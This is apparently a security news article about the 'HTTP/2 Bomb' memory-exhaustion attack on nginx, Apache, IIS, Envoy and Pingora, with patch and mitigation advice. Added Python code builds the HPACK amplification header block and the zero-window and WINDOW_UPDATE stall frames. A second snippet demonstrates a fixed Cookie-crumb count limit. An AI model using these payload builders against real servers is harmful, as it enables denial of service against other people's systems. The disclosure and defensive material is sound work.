
Researchers have disclosed a new denial-of-service (DoS) technique dubbed HTTP/2 Bomb, a memory-exhaustion attack that can render major web servers inaccessible within seconds.
The attack affects the default HTTP/2 configurations of nginx, Apache HTTP Server, Microsoft IIS, Envoy, and Cloudflare Pingora.
The attack was discovered by Codex and publicly disclosed on June 2, 2026. Researchers at security firm Calif demonstrated that a system connected via a 100 Mbps internet link could consume tens of gigabytes of server memory in under a minute. The discovery is credited to Quang Luong, with Jun Rong and Duc Phan validating the attack against additional server platforms.
The affected products power a significant portion of the web: nginx and Apache are among the most widely deployed web servers, IIS remains common in enterprise environments, and Envoy and Pingora are widely used as proxies in cloud infrastructure.
The attack combines two known HTTP/2 abuse techniques. The first targets HPACK, HTTP/2's header compression mechanism, which allows a previously transmitted header to be referenced by a compact index (a single byte for indexes below 127) into a per-connection dynamic table. By inserting one header into the dynamic table and then referencing it thousands of times, an attacker forces the server to decode and track thousands of header fields from a request that is only a few kilobytes on the wire.
The second stage abuses HTTP/2 flow control. By advertising a zero-byte flow-control window, the attacker prevents the server from sending its response and freeing the memory associated with the stream. Periodic one-byte WINDOW_UPDATE frames keep the connection alive and the allocations pinned, without ever letting the response drain.

The researchers note that both components of the attack have been public for years. The novelty lies in combining HPACK-based memory amplification with HTTP/2 flow-control stalling, creating a practical attack that can consume and hold large amounts of memory with minimal bandwidth.
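The two stages described above, as an added illustration written for this page (it is not code from the Calif researchers, from Codex, or from any of the affected servers). The first part encodes a HEADERS payload the way the HPACK stage requires: one literal header with incremental indexing, followed by N one-byte references to the dynamic-table entry it created, and a small decoder that shows how many fields the receiver must materialise from those bytes. The second part builds the SETTINGS and WINDOW_UPDATE frames for the stall. Two things are assumptions rather than facts from the article: that the zero window is advertised with SETTINGS_INITIAL_WINDOW_SIZE (the article does not say which mechanism the researchers used), and PER_HEADER_OVERHEAD, an illustrative per-field bookkeeping cost, not a measured figure for any server.

```python
# Added example: HPACK amplification measurement plus flow-control stall frames.
# Not code from the research or any affected server; see the lead-in for what
# is assumed.
import struct

SETTINGS, WINDOW_UPDATE = 0x4, 0x8        # frame types, RFC 9113
SETTINGS_INITIAL_WINDOW_SIZE = 0x4        # settings identifier, RFC 9113
STATIC_TABLE_SIZE = 61                    # RFC 7541: dynamic entries start at 62
PER_HEADER_OVERHEAD = 64                  # ASSUMED per-field bookkeeping bytes


def frame(ftype: int, flags: int, stream_id: int, payload: bytes) -> bytes:
    """Prefix payload with the 9-byte HTTP/2 frame header (24-bit length)."""
    return (struct.pack(">I", len(payload))[1:] + bytes([ftype, flags])
            + struct.pack(">I", stream_id & 0x7FFFFFFF) + payload)


def hpack_int(value: int, prefix_bits: int, prefix_flags: int) -> bytes:
    """RFC 7541 section 5.1 integer with an N-bit prefix."""
    limit = (1 << prefix_bits) - 1
    if value < limit:
        return bytes([prefix_flags | value])
    out = bytearray([prefix_flags | limit])
    value -= limit
    while value >= 128:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)


def hpack_str(s: bytes) -> bytes:
    """String literal without Huffman coding (H bit clear, 7-bit length)."""
    return hpack_int(len(s), 7, 0x00) + s


def bomb_header_block(name: bytes, value: bytes, repeats: int) -> bytes:
    """One 'literal with incremental indexing' (0x40, new name) that lands at
    dynamic index 62, then `repeats` one-byte indexed references (0xBE) to it.
    A real request would put the :method/:path/... pseudo-headers first."""
    literal = b"\x40" + hpack_str(name) + hpack_str(value)
    reference = hpack_int(STATIC_TABLE_SIZE + 1, 7, 0x80)
    return literal + reference * repeats


def decode_header_block(block: bytes) -> list:
    """Minimal HPACK decoder for the two representations used above; returns
    the list of (name, value) fields the receiver has to materialise."""
    dynamic = []          # newest entry first; entry i is index 62 + i
    fields = []
    pos = 0

    def read_int(prefix_bits: int) -> int:
        nonlocal pos
        limit = (1 << prefix_bits) - 1
        v = block[pos] & limit
        pos += 1
        if v < limit:
            return v
        shift = 0
        while True:
            b = block[pos]
            pos += 1
            v += (b & 0x7F) << shift
            shift += 7
            if not b & 0x80:
                return v

    def read_str() -> bytes:
        nonlocal pos
        if block[pos] & 0x80:
            raise ValueError("Huffman strings are not modelled in this example")
        n = read_int(7)
        s = block[pos:pos + n]
        pos += n
        return s

    while pos < len(block):
        first = block[pos]
        if first & 0x80:                       # indexed header field
            index = read_int(7)
            if index <= STATIC_TABLE_SIZE:
                raise ValueError("static table is not modelled in this example")
            fields.append(dynamic[index - STATIC_TABLE_SIZE - 1])
        elif first & 0x40:                     # literal with incremental indexing
            read_int(6)                        # name index 0: literal name follows
            entry = (read_str(), read_str())
            dynamic.insert(0, entry)
            fields.append(entry)
        else:
            raise ValueError("representation not modelled in this example")
    return fields


def amplification(name: bytes, value: bytes, repeats: int) -> dict:
    """Bytes on the wire versus fields decoded and bytes held (assumed overhead)."""
    block = bomb_header_block(name, value, repeats)
    fields = decode_header_block(block)
    decoded = sum(len(n) + len(v) for n, v in fields)
    held = decoded + len(fields) * PER_HEADER_OVERHEAD
    return {"wire_bytes": len(block), "fields": len(fields),
            "decoded_bytes": decoded, "held_bytes": held, "ratio": held / len(block)}


def stall_frames(stream_id: int) -> tuple:
    """Stage two: SETTINGS advertising a 0-byte initial stream window (ASSUMED
    mechanism), and a 1-byte WINDOW_UPDATE that keeps the stream alive."""
    settings = frame(SETTINGS, 0, 0, struct.pack(">HI", SETTINGS_INITIAL_WINDOW_SIZE, 0))
    window_update = frame(WINDOW_UPDATE, 0, stream_id, struct.pack(">I", 1))
    return settings, window_update


if __name__ == "__main__":
    r = amplification(b"cookie", b"a=b", 4000)
    print(f"{r['wire_bytes']} bytes on the wire -> {r['fields']} fields decoded, "
          f"~{r['held_bytes']} bytes held ({r['ratio']:.0f}:1 under the assumed overhead)")
    s, w = stall_frames(1)
    print("SETTINGS:", s.hex(), " WINDOW_UPDATE:", w.hex())
```

Note that the decoded header bytes here stay small (nine bytes per field); what grows is the number of fields, which is exactly what a limit on total decoded header size does not bound. Change PER_HEADER_OVERHEAD to see how the ratio tracks the per-field cost rather than the header content.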
According to Codex, the attack achieved the following results during testing:

| Server | Version | Amplification ratio | Memory consumed | Time |
| --- | --- | --- | --- | --- |
| Envoy | 1.37.2 | ~5,700:1 | 32 GB | ~10 seconds |
| Apache httpd | 2.4.67 | ~4,000:1 | 32 GB | ~18 seconds |
| nginx | 1.29.7 | ~70:1 | 32 GB | ~45 seconds |
| Microsoft IIS | Windows Server 2025 | ~68:1 | 64 GB | ~45 seconds |
Unlike earlier HPACK compression bombs, which relied on expanding large compressed values, the new technique exploits the per-field memory consumed by server-side header processing and bookkeeping. A limit on total decoded header size bounds the bytes of header content, not the number of fields or the overhead of tracking each one, so such limits do not stop the attack.
Researchers also identified a bypass involving fragmented Cookie headers. Apache and Envoy enforce limits on header counts, but split cookie “crumbs” were not counted toward those limits, enabling attackers to generate thousands of allocations while staying within configured restrictions.
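The counting mistake described above, as an added illustration written for this page (it is not Apache or Envoy code, and the limit of 100 and the request contents are constructed for the demo). HTTP/2 lets a client send the Cookie header as several separate fields that the server joins with "; " (RFC 9113, section 8.2.3). The weak policy applies the field limit to the list after that join, so thousands of crumbs count as one Cookie header; the corrected policy counts fields as they arrive, before any reassembly, and rejects the request as soon as the limit is crossed.

```python
# Added example: header-count limit applied after Cookie reassembly (weak)
# beside the same limit applied to fields as received (fixed). Not code from
# any of the affected servers; limit and request are constructed.

MAX_REQUEST_FIELDS = 100   # assumed limit for the demo


def reassemble_cookies(fields):
    """Join Cookie crumbs with '; ' as RFC 9113 section 8.2.3 requires.
    Returns the reassembled field list and the number of crumbs that had to
    be held individually until the join."""
    crumbs = [v for n, v in fields if n == b"cookie"]
    others = [(n, v) for n, v in fields if n != b"cookie"]
    if crumbs:
        others.append((b"cookie", b"; ".join(crumbs)))
    return others, len(crumbs)


def accept_weak(fields, limit=MAX_REQUEST_FIELDS):
    """Vulnerable policy: the limit is checked on the reassembled list, so a
    request carrying thousands of Cookie crumbs counts as a handful of fields."""
    joined, _ = reassemble_cookies(fields)
    return len(joined) <= limit


def accept_fixed(fields, limit=MAX_REQUEST_FIELDS):
    """Hardened policy: count every field as it is received, crumbs included,
    and stop as soon as the limit is exceeded so nothing past it is buffered."""
    count = 0
    for _ in fields:
        count += 1
        if count > limit:
            return False
    return True


def build_request(crumbs):
    """Constructed request: four pseudo-headers plus `crumbs` Cookie fields,
    yielded one at a time the way a decoder would hand them over."""
    yield from [(b":method", b"GET"), (b":path", b"/"),
                (b":scheme", b"https"), (b":authority", b"example.test")]
    for i in range(crumbs):
        yield (b"cookie", b"k%d=v" % i)


if __name__ == "__main__":
    print("weak policy accepts 3000 crumbs:", accept_weak(list(build_request(3000))))
    print("fixed policy accepts 3000 crumbs:", accept_fixed(build_request(3000)))
```

Because accept_fixed consumes the field stream lazily, it never materialises the crumbs beyond the limit, which is the property a count-based defence needs against an allocation-driven attack.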
A Shodan search conducted by the researchers found more than 880,000 internet-facing hosts supporting HTTP/2 and running one of the affected server products, although many are protected by CDNs.
nginx has already addressed the issue in version 1.29.8, which introduces a new max_headers directive. Apache fixed the flaw in mod_http2 v2.0.41 by ensuring cookie fragments count toward request field limits. The vulnerability was assigned CVE-2026-49975.
At the time of disclosure, no fixes were available for Microsoft IIS, Envoy, or Cloudflare Pingora, though their maintainers have been notified.
Organizations should upgrade affected software where patches are available. If that is not possible, researchers recommend disabling HTTP/2, enforcing hard limits on header counts, and applying memory limits to worker processes to prevent a single attack from exhausting system resources.